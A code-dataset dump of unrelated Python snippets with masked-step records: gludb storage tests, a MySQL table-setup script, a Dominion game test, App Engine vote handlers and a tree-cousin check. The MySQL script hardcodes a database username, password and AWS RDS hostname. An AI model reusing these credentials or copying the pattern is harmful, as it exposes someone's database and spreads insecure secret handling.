gludb.config.class_database(SimpleStorage, gludb.config.Database(\n 'sqlite', filename=':memory:'))\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n gludb.config.clear_database_config()\n\n\nclass PrefixedStorageTesting(DefaultStorageTesting):\n PREFIX = 'Prefix'\n\n def setUp(self):\n gludb.config.default_database(None)\n gludb.config.class_database(SimpleStorage, gludb.config.Database(\n 'sqlite', filename=':memory:'))\n gludb.config.set_db_application_prefix(self.PREFIX)\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n gludb.config.clear_database_config()\n gludb.config.set_db_application_prefix(None)\n\n def test_table_has_prefix(self):\n expectedName = (self.PREFIX + gludb.config._APPLICATION_SEP +\n SimpleStorage.__table_name__)\n self.assertEqual(SimpleStorage.get_table_name(), expectedName)\n",
"step-5": "\"\"\"Testing data storage functionality in gludb.simple (see simple_tests.py for\ntesting of the rest of gludb.simple functionality)\"\"\"\n\nimport unittest\nimport datetime\nimport time\n\nimport gludb.config\n\nfrom gludb.versioning import VersioningTypes\nfrom gludb.data import orig_version\nfrom gludb.simple import DBObject, Field\nfrom gludb.utils import parse_now_field\n\nfrom utils import compare_data_objects\n\n\n@DBObject(table_name='SimpleStorageTest', versioning=VersioningTypes.NONE)\nclass SimpleStorage(object):\n name = Field('default name')\n descrip = Field()\n age = Field(42)\n extra_data = Field(dict)\n\n\n# Same tests as DefaultStorageTesting but with differnt setUp/tearDown\nclass MissingMapTesting(unittest.TestCase):\n def setUp(self):\n gludb.config.default_database(None) # no default database\n\n def tearDown(self):\n # Undo any database setup\n gludb.config.clear_database_config()\n\n def test_failedops(self):\n def try_op():\n return gludb.config.get_mapping(SimpleStorage)\n self.assertRaises(ValueError, try_op)\n\n def test_justnomap(self):\n mapped = gludb.config.get_mapping(SimpleStorage, no_mapping_ok=True)\n self.assertIsNone(mapped)\n\n\nclass DefaultStorageTesting(unittest.TestCase):\n def setUp(self):\n gludb.config.default_database(gludb.config.Database(\n 'sqlite',\n filename=':memory:'\n ))\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n # Undo any database setup\n gludb.config.clear_database_config()\n\n def assertObjEq(self, obj1, obj2):\n self.assertTrue(compare_data_objects(obj1, obj2))\n\n def assertReadable(self, obj):\n read_back = obj.__class__.find_one(obj.id)\n self.assertObjEq(obj, read_back)\n orig_ver = obj.__class__.from_data(orig_version(read_back))\n self.assertObjEq(obj, orig_ver)\n\n def assertCloseTimes(self, d1, d2, eps=0.15):\n self.assertTrue(abs((d1 - d2).total_seconds()) < eps)\n\n def assertNotCloseTimes(self, d1, d2, eps=0.15):\n self.assertTrue(abs((d1 - d2).total_seconds()) >= eps)\n\n def test_missing(self):\n self.assertIsNone(SimpleStorage.find_one('not there'))\n \n def test_table_has_prefix(self):\n self.assertEqual(SimpleStorage.get_table_name(), SimpleStorage.__table_name__)\n\n def test_extra_fields(self):\n s = SimpleStorage(name='TimeTracking', descrip='FirstSave')\n s.save()\n\n create1 = parse_now_field(s._create_date)\n update1 = parse_now_field(s._last_update)\n\n self.assertCloseTimes(datetime.datetime.utcnow(), update1)\n self.assertCloseTimes(create1, update1)\n\n # Sucks, but we need to space out our timestamps\n time.sleep(0.3)\n\n s.descrip = 'SecondSave'\n s.save()\n\n create2 = parse_now_field(s._create_date)\n update2 = parse_now_field(s._last_update)\n\n self.assertCloseTimes(datetime.datetime.utcnow(), update2)\n self.assertCloseTimes(create1, create2)\n self.assertNotCloseTimes(update1, update2)\n\n s2 = SimpleStorage.find_one(s.id)\n create3 = parse_now_field(s2._create_date)\n update3 = parse_now_field(s2._last_update)\n\n # Note that we DON'T check for string equality - that's because\n # _last_update is updated every time the instance method to_data is\n # called. See simple.md for extra details on auto fields\n self.assertCloseTimes(create2, create3)\n self.assertCloseTimes(update2, update3)\n\n def test_readwrite(self):\n s = SimpleStorage(name='Pre', descrip='Testing', age=-1)\n self.assertEquals('', s.id)\n self.assertEquals('Pre', s.name)\n self.assertEquals('Testing', s.descrip)\n self.assertEquals(-1, s.age)\n self.assertEquals({}, s.extra_data)\n\n s.extra_data['coolness'] = {'a': 123, 'b': 456}\n s.extra_data['list-thing'] = [1, 2, 3, 4, 5, 6]\n s.extra_data['oscar'] = 'grouch'\n s.extra_data['fp'] = 42.42\n\n self.assertTrue(orig_version(s) is None)\n\n s.save()\n self.assertTrue(len(s.id) > 0)\n self.assertReadable(s)\n # Saved - so should have a prev version that is identical\n self.assertObjEq(s, SimpleStorage.from_data(orig_version(s)))\n\n s2 = SimpleStorage(id=s.id, name='Post', descrip='AtItAgain', age=256)\n s2.save()\n self.assertReadable(s2)\n\n all_recs = SimpleStorage.find_all()\n self.assertEqual(1, len(all_recs))\n self.assertObjEq(s2, all_recs[0])\n\n # Change the object we read and then insure that the pervious version\n # saved on load is correct\n read_obj = all_recs[0]\n read_obj.name = 'Pre2'\n read_obj.descrip = 'Testing2'\n read_obj.age = -2\n\n s0 = SimpleStorage.from_data(orig_version(read_obj))\n self.assertEquals(s.id, s0.id)\n self.assertEquals('Post', s0.name)\n self.assertEquals('AtItAgain', s0.descrip)\n self.assertEquals(256, s0.age)\n self.assertEquals({}, s0.extra_data)\n\n\n# Same tests as DefaultStorageTesting but with differnt setUp/tearDown\nclass SpecificStorageTesting(DefaultStorageTesting):\n def setUp(self):\n gludb.config.default_database(None) # no default database\n gludb.config.class_database(SimpleStorage, gludb.config.Database(\n 'sqlite',\n filename=':memory:'\n ))\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n # Undo any database setup\n gludb.config.clear_database_config()\n\n \n# Same tests as DefaultStorageTesting but with differnt setUp/tearDown\nclass PrefixedStorageTesting(DefaultStorageTesting):\n PREFIX = \"Prefix\"\n \n def setUp(self):\n gludb.config.default_database(None) # no default database\n gludb.config.class_database(SimpleStorage, gludb.config.Database(\n 'sqlite',\n filename=':memory:'\n ))\n gludb.config.set_db_application_prefix(self.PREFIX)\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n # Undo any database setup\n gludb.config.clear_database_config()\n gludb.config.set_db_application_prefix(None)\n \n def test_table_has_prefix(self):\n expectedName = self.PREFIX + gludb.config._APPLICATION_SEP + SimpleStorage.__table_name__\n self.assertEqual(SimpleStorage.get_table_name(), expectedName)",
"step-ids": [
16,
21,
24,
25,
28
]
}
|
[
16,
21,
24,
25,
28
] |
import requests
save_result = requests.post('http://localhost:5000/save', json={'value':
'witam'})
print(save_result.text)
read_result = requests.get('http://localhost:5000/read')
print(read_result.text)
|
normal
|
{
"blob_id": "43362c564be0dfbc8f246a0589bcebde245ab7b5",
"index": 7015,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(save_result.text)\n<mask token>\nprint(read_result.text)\n",
"step-3": "<mask token>\nsave_result = requests.post('http://localhost:5000/save', json={'value':\n 'witam'})\nprint(save_result.text)\nread_result = requests.get('http://localhost:5000/read')\nprint(read_result.text)\n",
"step-4": "import requests\nsave_result = requests.post('http://localhost:5000/save', json={'value':\n 'witam'})\nprint(save_result.text)\nread_result = requests.get('http://localhost:5000/read')\nprint(read_result.text)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import mysql.connector
from mysql.connector import errorcode
DB_NAME = 'PieDB'
TABLES = {}
# TABLES['pietweets'] = (
# "CREATE TABLE `pietweets` ("
# " `id` int NOT NULL AUTO_INCREMENT,"
# " `tweet_id` bigint NOT NULL,"
# " `username` varchar(32) NOT NULL,"
# " `geo_lat` float(53) NOT NULL,"
# " `geo_long` float(53) NOT NULL,"
# " `text` varchar(255) NOT NULL,"
# " `timestamp` datetime NOT NULL,"
# " PRIMARY KEY (`id`)"
# ") ENGINE=InnoDB")
TABLES['lemonpie'] = (
"CREATE TABLE `lemonpie` ("
" `id` int NOT NULL AUTO_INCREMENT,"
" `tweet_id` bigint NOT NULL,"
" `username` varchar(32) NOT NULL,"
" `geo_lat` float(53) NOT NULL,"
" `geo_long` float(53) NOT NULL,"
" `text` varchar(255) NOT NULL,"
" `timestamp` datetime NOT NULL,"
" PRIMARY KEY (`id`)"
") ENGINE=InnoDB")
# DB credentials
config = {
'user': 'piemaster',
'password': 'piemaster123',
'host': 'piedb.chhtgdmxqekc.us-east-1.rds.amazonaws.com',
'database': 'PieDB',
'raise_on_warnings': True,
}
# establish connection with DB config credentials
cnx = mysql.connector.connect(**config)
cursor = cnx.cursor()
def create_database(cursor):
try:
cursor.execute(
"CREATE DATABASE {} DEFAULT CHARACTER SET 'utf8'".format(DB_NAME))
except mysql.connector.Error as err:
print("Failed creating database: {}".format(err))
exit(1)
# try connecting to designated DB, if not exist - create this DB
try:
cnx.database = DB_NAME
except mysql.connector.Error as err:
if err.errno == errorcode.ER_BAD_DB_ERROR:
create_database(cursor)
cnx.database = DB_NAME
else:
print(err)
exit(1)
# iterate through TABLES and create each table
for name, ddl in TABLES.iteritems():
try:
print("Creating table {}: ".format(name))
cursor.execute(ddl)
except mysql.connector.Error as err:
if err.errno == errorcode.ER_TABLE_EXISTS_ERROR:
print("already exists.")
else:
print(err.msg)
else:
print("OK")
# closing db connection
cursor.close()
cnx.close()
|
normal
|
{
"blob_id": "38abc4bc99f3b15b416c77481818464a6c7f11ef",
"index": 3844,
"step-1": "<mask token>\n\n\ndef create_database(cursor):\n try:\n cursor.execute(\"CREATE DATABASE {} DEFAULT CHARACTER SET 'utf8'\".\n format(DB_NAME))\n except mysql.connector.Error as err:\n print('Failed creating database: {}'.format(err))\n exit(1)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef create_database(cursor):\n try:\n cursor.execute(\"CREATE DATABASE {} DEFAULT CHARACTER SET 'utf8'\".\n format(DB_NAME))\n except mysql.connector.Error as err:\n print('Failed creating database: {}'.format(err))\n exit(1)\n\n\ntry:\n cnx.database = DB_NAME\nexcept mysql.connector.Error as err:\n if err.errno == errorcode.ER_BAD_DB_ERROR:\n create_database(cursor)\n cnx.database = DB_NAME\n else:\n print(err)\n exit(1)\nfor name, ddl in TABLES.iteritems():\n try:\n print('Creating table {}: '.format(name))\n cursor.execute(ddl)\n except mysql.connector.Error as err:\n if err.errno == errorcode.ER_TABLE_EXISTS_ERROR:\n print('already exists.')\n else:\n print(err.msg)\n else:\n print('OK')\ncursor.close()\ncnx.close()\n",
"step-3": "<mask token>\nDB_NAME = 'PieDB'\nTABLES = {}\nTABLES['lemonpie'] = (\n 'CREATE TABLE `lemonpie` ( `id` int NOT NULL AUTO_INCREMENT, `tweet_id` bigint NOT NULL, `username` varchar(32) NOT NULL, `geo_lat` float(53) NOT NULL, `geo_long` float(53) NOT NULL, `text` varchar(255) NOT NULL, `timestamp` datetime NOT NULL, PRIMARY KEY (`id`)) ENGINE=InnoDB'\n )\nconfig = {'user': 'piemaster', 'password': 'piemaster123', 'host':\n 'piedb.chhtgdmxqekc.us-east-1.rds.amazonaws.com', 'database': 'PieDB',\n 'raise_on_warnings': True}\ncnx = mysql.connector.connect(**config)\ncursor = cnx.cursor()\n\n\ndef create_database(cursor):\n try:\n cursor.execute(\"CREATE DATABASE {} DEFAULT CHARACTER SET 'utf8'\".\n format(DB_NAME))\n except mysql.connector.Error as err:\n print('Failed creating database: {}'.format(err))\n exit(1)\n\n\ntry:\n cnx.database = DB_NAME\nexcept mysql.connector.Error as err:\n if err.errno == errorcode.ER_BAD_DB_ERROR:\n create_database(cursor)\n cnx.database = DB_NAME\n else:\n print(err)\n exit(1)\nfor name, ddl in TABLES.iteritems():\n try:\n print('Creating table {}: '.format(name))\n cursor.execute(ddl)\n except mysql.connector.Error as err:\n if err.errno == errorcode.ER_TABLE_EXISTS_ERROR:\n print('already exists.')\n else:\n print(err.msg)\n else:\n print('OK')\ncursor.close()\ncnx.close()\n",
"step-4": "import mysql.connector\nfrom mysql.connector import errorcode\nDB_NAME = 'PieDB'\nTABLES = {}\nTABLES['lemonpie'] = (\n 'CREATE TABLE `lemonpie` ( `id` int NOT NULL AUTO_INCREMENT, `tweet_id` bigint NOT NULL, `username` varchar(32) NOT NULL, `geo_lat` float(53) NOT NULL, `geo_long` float(53) NOT NULL, `text` varchar(255) NOT NULL, `timestamp` datetime NOT NULL, PRIMARY KEY (`id`)) ENGINE=InnoDB'\n )\nconfig = {'user': 'piemaster', 'password': 'piemaster123', 'host':\n 'piedb.chhtgdmxqekc.us-east-1.rds.amazonaws.com', 'database': 'PieDB',\n 'raise_on_warnings': True}\ncnx = mysql.connector.connect(**config)\ncursor = cnx.cursor()\n\n\ndef create_database(cursor):\n try:\n cursor.execute(\"CREATE DATABASE {} DEFAULT CHARACTER SET 'utf8'\".\n format(DB_NAME))\n except mysql.connector.Error as err:\n print('Failed creating database: {}'.format(err))\n exit(1)\n\n\ntry:\n cnx.database = DB_NAME\nexcept mysql.connector.Error as err:\n if err.errno == errorcode.ER_BAD_DB_ERROR:\n create_database(cursor)\n cnx.database = DB_NAME\n else:\n print(err)\n exit(1)\nfor name, ddl in TABLES.iteritems():\n try:\n print('Creating table {}: '.format(name))\n cursor.execute(ddl)\n except mysql.connector.Error as err:\n if err.errno == errorcode.ER_TABLE_EXISTS_ERROR:\n print('already exists.')\n else:\n print(err.msg)\n else:\n print('OK')\ncursor.close()\ncnx.close()\n",
"step-5": "import mysql.connector\nfrom mysql.connector import errorcode\n\nDB_NAME = 'PieDB'\n\nTABLES = {}\n# TABLES['pietweets'] = (\n# \t\"CREATE TABLE `pietweets` (\"\n# \t\" `id` int NOT NULL AUTO_INCREMENT,\"\t\t\n# \t\" `tweet_id` bigint NOT NULL,\"\n# \t\" `username` varchar(32) NOT NULL,\"\n# \t\" `geo_lat` float(53) NOT NULL,\"\n# \t\" `geo_long` float(53) NOT NULL,\"\n# \t\" `text` varchar(255) NOT NULL,\"\n# \t\" `timestamp` datetime NOT NULL,\"\n# \t\" PRIMARY KEY (`id`)\"\n# \t\") ENGINE=InnoDB\")\nTABLES['lemonpie'] = (\n \"CREATE TABLE `lemonpie` (\"\n \" `id` int NOT NULL AUTO_INCREMENT,\" \n \" `tweet_id` bigint NOT NULL,\"\n \" `username` varchar(32) NOT NULL,\"\n \" `geo_lat` float(53) NOT NULL,\"\n \" `geo_long` float(53) NOT NULL,\"\n \" `text` varchar(255) NOT NULL,\"\n \" `timestamp` datetime NOT NULL,\"\n \" PRIMARY KEY (`id`)\"\n \") ENGINE=InnoDB\")\n\n# DB credentials\nconfig = {\n 'user': 'piemaster',\n 'password': 'piemaster123',\n 'host': 'piedb.chhtgdmxqekc.us-east-1.rds.amazonaws.com',\n 'database': 'PieDB',\n 'raise_on_warnings': True,\n}\n\n# establish connection with DB config credentials\ncnx = mysql.connector.connect(**config)\ncursor = cnx.cursor()\n\ndef create_database(cursor):\n try:\n cursor.execute(\n \"CREATE DATABASE {} DEFAULT CHARACTER SET 'utf8'\".format(DB_NAME))\n except mysql.connector.Error as err:\n print(\"Failed creating database: {}\".format(err))\n exit(1)\n\n# try connecting to designated DB, if not exist - create this DB\ntry:\n cnx.database = DB_NAME \nexcept mysql.connector.Error as err:\n if err.errno == errorcode.ER_BAD_DB_ERROR:\n create_database(cursor)\n cnx.database = DB_NAME\n else:\n print(err)\n exit(1)\n\n# iterate through TABLES and create each table\nfor name, ddl in TABLES.iteritems():\n try:\n print(\"Creating table {}: \".format(name))\n cursor.execute(ddl)\n except mysql.connector.Error as err:\n if err.errno == errorcode.ER_TABLE_EXISTS_ERROR:\n print(\"already exists.\")\n else:\n print(err.msg)\n else:\n print(\"OK\")\n\n# closing db connection\ncursor.close()\ncnx.close()\n\n\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
setup(name='nodepool_harness', version='0.1dev', description=
'Nodepool harness', packages=['nodepool_harness', 'statsd',
'apscheduler'], install_requires=['PyYAML', 'python-novaclient',
'paramiko', 'sqlalchemy'], entry_points={'console_scripts': [
'nh-install-node = nodepool_harness.scripts:install_node']})
<|reserved_special_token_1|>
from setuptools import setup
setup(name='nodepool_harness', version='0.1dev', description=
'Nodepool harness', packages=['nodepool_harness', 'statsd',
'apscheduler'], install_requires=['PyYAML', 'python-novaclient',
'paramiko', 'sqlalchemy'], entry_points={'console_scripts': [
'nh-install-node = nodepool_harness.scripts:install_node']})
<|reserved_special_token_1|>
from setuptools import setup
setup(
name='nodepool_harness',
version='0.1dev',
description='Nodepool harness',
packages=['nodepool_harness', 'statsd', 'apscheduler'],
install_requires=["PyYAML", "python-novaclient", "paramiko", "sqlalchemy"],
entry_points = {
'console_scripts': [
'nh-install-node = nodepool_harness.scripts:install_node',
]
}
)
|
flexible
|
{
"blob_id": "61ff5fae02d18d51595e8050d97244574e7d8af1",
"index": 6419,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nsetup(name='nodepool_harness', version='0.1dev', description=\n 'Nodepool harness', packages=['nodepool_harness', 'statsd',\n 'apscheduler'], install_requires=['PyYAML', 'python-novaclient',\n 'paramiko', 'sqlalchemy'], entry_points={'console_scripts': [\n 'nh-install-node = nodepool_harness.scripts:install_node']})\n",
"step-3": "from setuptools import setup\nsetup(name='nodepool_harness', version='0.1dev', description=\n 'Nodepool harness', packages=['nodepool_harness', 'statsd',\n 'apscheduler'], install_requires=['PyYAML', 'python-novaclient',\n 'paramiko', 'sqlalchemy'], entry_points={'console_scripts': [\n 'nh-install-node = nodepool_harness.scripts:install_node']})\n",
"step-4": "from setuptools import setup\n\n\nsetup(\n name='nodepool_harness',\n version='0.1dev',\n description='Nodepool harness',\n packages=['nodepool_harness', 'statsd', 'apscheduler'],\n install_requires=[\"PyYAML\", \"python-novaclient\", \"paramiko\", \"sqlalchemy\"],\n entry_points = {\n 'console_scripts': [\n 'nh-install-node = nodepool_harness.scripts:install_node',\n ]\n }\n)",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
testUtility.play_game(supply, supply_order, players, trash)
testUtility.display_game_results(players)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
player_names = ['Annie', '*Ben', '*Carla']
nV, nC = testUtility.set_vc_number(player_names)
box, supply_order = testUtility.define_box(nV)
supply = testUtility.set_supply(box, player_names, nV, nC)
trash = []
supply['Copper'] = [Dominion.Copper()] * (60 - len(player_names) * 7)
supply['Silver'] = [Dominion.Silver()] * 0
supply['Gold'] = [Dominion.Gold()] * 0
players = testUtility.set_players(player_names)
testUtility.play_game(supply, supply_order, players, trash)
testUtility.display_game_results(players)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import Dominion
import testUtility
import random
from collections import defaultdict
player_names = ['Annie', '*Ben', '*Carla']
nV, nC = testUtility.set_vc_number(player_names)
box, supply_order = testUtility.define_box(nV)
supply = testUtility.set_supply(box, player_names, nV, nC)
trash = []
supply['Copper'] = [Dominion.Copper()] * (60 - len(player_names) * 7)
supply['Silver'] = [Dominion.Silver()] * 0
supply['Gold'] = [Dominion.Gold()] * 0
players = testUtility.set_players(player_names)
testUtility.play_game(supply, supply_order, players, trash)
testUtility.display_game_results(players)
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
""""
Created on Saturday, January 18, 2020
@author: lieur
This test case sets silver and gold to 0, which in most cases prevent the computer from
buying provinces. This tests to see if the game ends when one more supply car hits 0 (since
silver and gold are already at 0 and the game ends when 3 supply deck hits 0)
"""""
import Dominion
import testUtility
import random
from collections import defaultdict
# Get player names
player_names = ["Annie", "*Ben", "*Carla"]
# Set number of curses and victory cards
nV, nC = testUtility.set_vc_number(player_names)
# Define box and supply_order
box, supply_order = testUtility.define_box(nV)
# Choose and set supply cards
supply = testUtility.set_supply(box, player_names, nV, nC)
# Initialize the trash
trash = []
# Test silver and gold = 0
supply["Copper"]=[Dominion.Copper()]*(60-len(player_names)*7)
supply["Silver"]=[Dominion.Silver()]*0
supply["Gold"]=[Dominion.Gold()]*0
# Construct the Player objects
players = testUtility.set_players(player_names)
# Play the game
testUtility.play_game(supply, supply_order, players, trash)
# Final score
testUtility.display_game_results(players)
|
flexible
|
{
"blob_id": "fa833e9cd1e624d9ecfb2fcc6d9e22955c9e4b1e",
"index": 6258,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ntestUtility.play_game(supply, supply_order, players, trash)\ntestUtility.display_game_results(players)\n",
"step-3": "<mask token>\nplayer_names = ['Annie', '*Ben', '*Carla']\nnV, nC = testUtility.set_vc_number(player_names)\nbox, supply_order = testUtility.define_box(nV)\nsupply = testUtility.set_supply(box, player_names, nV, nC)\ntrash = []\nsupply['Copper'] = [Dominion.Copper()] * (60 - len(player_names) * 7)\nsupply['Silver'] = [Dominion.Silver()] * 0\nsupply['Gold'] = [Dominion.Gold()] * 0\nplayers = testUtility.set_players(player_names)\ntestUtility.play_game(supply, supply_order, players, trash)\ntestUtility.display_game_results(players)\n",
"step-4": "<mask token>\nimport Dominion\nimport testUtility\nimport random\nfrom collections import defaultdict\nplayer_names = ['Annie', '*Ben', '*Carla']\nnV, nC = testUtility.set_vc_number(player_names)\nbox, supply_order = testUtility.define_box(nV)\nsupply = testUtility.set_supply(box, player_names, nV, nC)\ntrash = []\nsupply['Copper'] = [Dominion.Copper()] * (60 - len(player_names) * 7)\nsupply['Silver'] = [Dominion.Silver()] * 0\nsupply['Gold'] = [Dominion.Gold()] * 0\nplayers = testUtility.set_players(player_names)\ntestUtility.play_game(supply, supply_order, players, trash)\ntestUtility.display_game_results(players)\n",
"step-5": "# -*- coding: utf-8 -*-\n\"\"\"\"\nCreated on Saturday, January 18, 2020\n\n@author: lieur\n\nThis test case sets silver and gold to 0, which in most cases prevent the computer from\nbuying provinces. This tests to see if the game ends when one more supply car hits 0 (since\nsilver and gold are already at 0 and the game ends when 3 supply deck hits 0)\n\"\"\"\"\"\n\nimport Dominion\nimport testUtility\nimport random\nfrom collections import defaultdict\n\n# Get player names\nplayer_names = [\"Annie\", \"*Ben\", \"*Carla\"]\n\n# Set number of curses and victory cards\nnV, nC = testUtility.set_vc_number(player_names)\n\n# Define box and supply_order\nbox, supply_order = testUtility.define_box(nV)\n\n\n# Choose and set supply cards\nsupply = testUtility.set_supply(box, player_names, nV, nC)\n\n# Initialize the trash\ntrash = []\n# Test silver and gold = 0\nsupply[\"Copper\"]=[Dominion.Copper()]*(60-len(player_names)*7)\nsupply[\"Silver\"]=[Dominion.Silver()]*0\nsupply[\"Gold\"]=[Dominion.Gold()]*0\n\n# Construct the Player objects\nplayers = testUtility.set_players(player_names)\n\n# Play the game\ntestUtility.play_game(supply, supply_order, players, trash)\n\n# Final score\ntestUtility.display_game_results(players)",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# [BEGIN IMPORTS]
from mainhandler import MainHandler
from sec.data import *
# [END IMPORTS]
class UpVoteHandler (MainHandler):
def get(self):
user = self.get_user()
if user:
post_id = self.request.get('post_id')
post = PostData.get_by_id(int(post_id))
voter_list = post.voter_list
if post.author == user:
error = "cant vote for self"
self.render('mainpage.html', error=error)
elif user in voter_list:
error = "cant vote twice"
self.render('mainpage.html', error=error)
else:
post.upscore += 1
voter_list.append(user)
post.put()
self.redirect('/blog/' + post_id)
else:
self.redirect('/')
class DownVoteHandler (MainHandler):
def get(self):
user = self.get_user()
if user:
post_id = self.request.get('post_id')
post = PostData.get_by_id(int(post_id))
voter_list = post.voter_list
if post.author == user:
error = "cant vote for self"
self.render('mainpage.html', error=error)
elif user in voter_list:
error = "cant vote twice"
self.render('mainpage.html', error=error)
else:
post.downscore += 1
voter_list.append(user)
post.put()
self.redirect('/blog/' + post_id)
else:
self.redirect('/')
|
normal
|
{
"blob_id": "5711613df0bda10512466f147febcffacfe1607b",
"index": 7794,
"step-1": "<mask token>\n\n\nclass DownVoteHandler(MainHandler):\n\n def get(self):\n user = self.get_user()\n if user:\n post_id = self.request.get('post_id')\n post = PostData.get_by_id(int(post_id))\n voter_list = post.voter_list\n if post.author == user:\n error = 'cant vote for self'\n self.render('mainpage.html', error=error)\n elif user in voter_list:\n error = 'cant vote twice'\n self.render('mainpage.html', error=error)\n else:\n post.downscore += 1\n voter_list.append(user)\n post.put()\n self.redirect('/blog/' + post_id)\n else:\n self.redirect('/')\n",
"step-2": "<mask token>\n\n\nclass UpVoteHandler(MainHandler):\n <mask token>\n\n\nclass DownVoteHandler(MainHandler):\n\n def get(self):\n user = self.get_user()\n if user:\n post_id = self.request.get('post_id')\n post = PostData.get_by_id(int(post_id))\n voter_list = post.voter_list\n if post.author == user:\n error = 'cant vote for self'\n self.render('mainpage.html', error=error)\n elif user in voter_list:\n error = 'cant vote twice'\n self.render('mainpage.html', error=error)\n else:\n post.downscore += 1\n voter_list.append(user)\n post.put()\n self.redirect('/blog/' + post_id)\n else:\n self.redirect('/')\n",
"step-3": "<mask token>\n\n\nclass UpVoteHandler(MainHandler):\n\n def get(self):\n user = self.get_user()\n if user:\n post_id = self.request.get('post_id')\n post = PostData.get_by_id(int(post_id))\n voter_list = post.voter_list\n if post.author == user:\n error = 'cant vote for self'\n self.render('mainpage.html', error=error)\n elif user in voter_list:\n error = 'cant vote twice'\n self.render('mainpage.html', error=error)\n else:\n post.upscore += 1\n voter_list.append(user)\n post.put()\n self.redirect('/blog/' + post_id)\n else:\n self.redirect('/')\n\n\nclass DownVoteHandler(MainHandler):\n\n def get(self):\n user = self.get_user()\n if user:\n post_id = self.request.get('post_id')\n post = PostData.get_by_id(int(post_id))\n voter_list = post.voter_list\n if post.author == user:\n error = 'cant vote for self'\n self.render('mainpage.html', error=error)\n elif user in voter_list:\n error = 'cant vote twice'\n self.render('mainpage.html', error=error)\n else:\n post.downscore += 1\n voter_list.append(user)\n post.put()\n self.redirect('/blog/' + post_id)\n else:\n self.redirect('/')\n",
"step-4": "from mainhandler import MainHandler\nfrom sec.data import *\n\n\nclass UpVoteHandler(MainHandler):\n\n def get(self):\n user = self.get_user()\n if user:\n post_id = self.request.get('post_id')\n post = PostData.get_by_id(int(post_id))\n voter_list = post.voter_list\n if post.author == user:\n error = 'cant vote for self'\n self.render('mainpage.html', error=error)\n elif user in voter_list:\n error = 'cant vote twice'\n self.render('mainpage.html', error=error)\n else:\n post.upscore += 1\n voter_list.append(user)\n post.put()\n self.redirect('/blog/' + post_id)\n else:\n self.redirect('/')\n\n\nclass DownVoteHandler(MainHandler):\n\n def get(self):\n user = self.get_user()\n if user:\n post_id = self.request.get('post_id')\n post = PostData.get_by_id(int(post_id))\n voter_list = post.voter_list\n if post.author == user:\n error = 'cant vote for self'\n self.render('mainpage.html', error=error)\n elif user in voter_list:\n error = 'cant vote twice'\n self.render('mainpage.html', error=error)\n else:\n post.downscore += 1\n voter_list.append(user)\n post.put()\n self.redirect('/blog/' + post_id)\n else:\n self.redirect('/')\n",
"step-5": "# [BEGIN IMPORTS]\nfrom mainhandler import MainHandler\nfrom sec.data import *\n# [END IMPORTS]\n\n\nclass UpVoteHandler (MainHandler):\n\n def get(self):\n user = self.get_user()\n if user:\n post_id = self.request.get('post_id')\n post = PostData.get_by_id(int(post_id))\n\n voter_list = post.voter_list\n\n if post.author == user:\n error = \"cant vote for self\"\n self.render('mainpage.html', error=error)\n elif user in voter_list:\n error = \"cant vote twice\"\n self.render('mainpage.html', error=error)\n else:\n post.upscore += 1\n voter_list.append(user)\n post.put()\n self.redirect('/blog/' + post_id)\n else:\n self.redirect('/')\n\n\nclass DownVoteHandler (MainHandler):\n\n def get(self):\n user = self.get_user()\n if user:\n post_id = self.request.get('post_id')\n post = PostData.get_by_id(int(post_id))\n\n voter_list = post.voter_list\n\n if post.author == user:\n error = \"cant vote for self\"\n self.render('mainpage.html', error=error)\n elif user in voter_list:\n error = \"cant vote twice\"\n self.render('mainpage.html', error=error)\n else:\n post.downscore += 1\n voter_list.append(user)\n post.put()\n self.redirect('/blog/' + post_id)\n else:\n self.redirect('/')\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def isCousin(root, a, b):
if check(root, a, b) == False:
return False
q = []
q.insert(0, root)
tmp = set()
while len(q):
l = len(q)
for i in range(l):
n = q.pop()
tmp.add(n.data)
if n.left:
q.insert(0, n.left)
if n.right:
q.insert(0, n.right)
if a in tmp and b in tmp:
return True
tmp.clear()
return False
<|reserved_special_token_1|>
def check(root, a, b):
if root:
if (root.left == a and root.right == b or root.left == b and root.
right == a):
return False
return check(root.left, a, b) and check(root.right, a, b)
return True
def isCousin(root, a, b):
if check(root, a, b) == False:
return False
q = []
q.insert(0, root)
tmp = set()
while len(q):
l = len(q)
for i in range(l):
n = q.pop()
tmp.add(n.data)
if n.left:
q.insert(0, n.left)
if n.right:
q.insert(0, n.right)
if a in tmp and b in tmp:
return True
tmp.clear()
return False
<|reserved_special_token_1|>
def check(root, a, b):
if root:
if (root.left == a and root.right == b) or (root.left ==b and root.right==a):
return False
return check(root.left, a, b) and check(root.right, a, b)
return True
def isCousin(root, a, b):
# Your code here
if check(root, a, b)==False:
return False
q=[]
q.insert(0, root)
tmp=set()
while(len(q)):
l = len(q)
for i in range(l):
n = q.pop()
tmp.add(n.data)
if n.left:
q.insert(0, n.left)
if n.right:
q.insert(0, n.right)
if a in tmp and b in tmp:
return True
tmp.clear()
return False
|
flexible
|
{
"blob_id": "96cfee85194c9c30b3d74bbddc2a31b6933eb032",
"index": 2226,
"step-1": "<mask token>\n",
